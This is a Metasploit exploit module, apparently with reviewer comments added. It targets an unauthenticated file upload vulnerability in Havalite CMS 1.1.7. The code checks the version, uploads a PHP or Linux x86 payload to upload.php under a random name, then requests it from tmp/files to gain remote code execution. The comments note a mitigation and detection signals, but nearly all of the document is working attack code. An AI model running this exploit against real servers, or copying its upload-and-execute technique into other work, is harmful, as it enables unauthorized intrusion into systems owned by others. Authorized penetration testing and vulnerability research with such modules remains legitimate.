##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Havalite CMS 1.1.7 unauthenticated file upload. The flow is two HTTP requests:
# a multipart POST to havalite/upload.php (no credentials) followed by a GET of the
# stored file under havalite/tmp/files/. Mitigation on the application side is to
# require authentication on upload.php and to refuse to store or serve executable
# (.php) files from the tmp/files directory.
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  #
  # Module metadata. Two targets are offered: a native PHP payload (default) and a
  # Linux x86 payload delivered through the PhpEXE mixin. TARGETURI is the only
  # module-specific option; host, port and SSL options come from HttpClient.
  #
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Havalite CMS Arbitary File Upload Vulnerability",
        'Description' => %q{
          This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
          possibly prior. Attackers can abuse the upload feature in order to upload a
          malicious PHP file without authentication, which results in arbitrary remote code
          execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'CWH',
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['OSVDB', '94405'],
          ['EDB', '26243']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Platform' => %w{linux php},
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-06-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
      ]
    )
  end

  #
  # Checks if target is running HavaLite CMS 1.1.7
  # We only flag 1.1.7 as vulnerable, because we don't have enough information from
  # the vendor or OSVDB about exactly which ones are really vulnerable.
  #
  # The version string is scraped from the first inline <script> block of the
  # havalite/ index page (its `var myVersion = '...'` assignment). A request that
  # gets no response at all is reported as Unknown rather than Safe, so a timeout
  # is never read as "not vulnerable".
  #
  # @return [Exploit::CheckCode] Appears, Safe or Unknown
  #
  def check
    uri = normalize_uri(target_uri.path, 'havalite/')
    res = send_request_raw({ 'uri' => uri })

    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # /m lets (.+) span newlines; only the first matching <script> block is used, so
    # a page whose first script block is not the version block yields no version.
    js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
    version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''

    # NOTE(review): the empty? test is redundant with the regex match (an empty
    # string cannot match /1\.1\.7/), and the match is unanchored, so any version
    # string containing "1.1.7" (a hypothetical "1.1.70", say) would also be flagged.
    if not version.empty? and version =~ /1\.1\.7/
      vprint_status("Version found: #{version}")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  #
  # Uploads our malicious file
  #
  # Sends one multipart/form-data POST to havalite/upload.php with a single part
  # named files[] carrying the payload under a random five-letter .php filename.
  # No credentials or cookies are sent; the missing authentication check on
  # upload.php is the vulnerability being exploited.
  #
  # Failure handling: a nil response (timeout), a 404 (no upload.php) or a body
  # containing "error":"abort" each stop the run via fail_with. Any other response
  # is treated as success without further validation of the body.
  #
  # @param base [String] the TARGETURI path the havalite/ directory lives under
  # @return [String] the filename that was uploaded, for exec to request
  #
  def upload(base)
    # :unlink_self presumably asks the dropped file to remove itself once it has
    # run -- confirm against Msf::Exploit::PhpEXE before relying on it for cleanup.
    p = get_write_exec_payload(:unlink_self => true)
    fname = "#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(base, 'havalite', 'upload.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.body =~ /"error"\:"abort"/
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    return fname
  end

  #
  # Executes our uploaded malicious file
  #
  # Requests the uploaded file from havalite/tmp/files/<name>, where the upload
  # handler is expected to have stored it. Only an explicit 404 is treated as a
  # failure; a nil response (e.g. a timeout) passes silently rather than failing
  # the run.
  #
  # NOTE(review): upload compares res.code.to_i == 404 while this method compares
  # res.code == 404 directly; the two should agree on whether a coercion is needed.
  #
  # @param base [String] the TARGETURI path the havalite/ directory lives under
  # @param payload_fname [String] the filename returned by upload
  #
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'havalite', 'tmp', 'files', payload_fname)
    })

    if res and res.code == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end

  #
  # Entry point: upload the payload, then request it so the server executes it.
  # From the defender's side this is an unauthenticated multipart POST to
  # havalite/upload.php followed by a GET under havalite/tmp/files/ for a
  # random-named .php file; both are worth alerting on.
  #
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    fname = upload(base)

    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end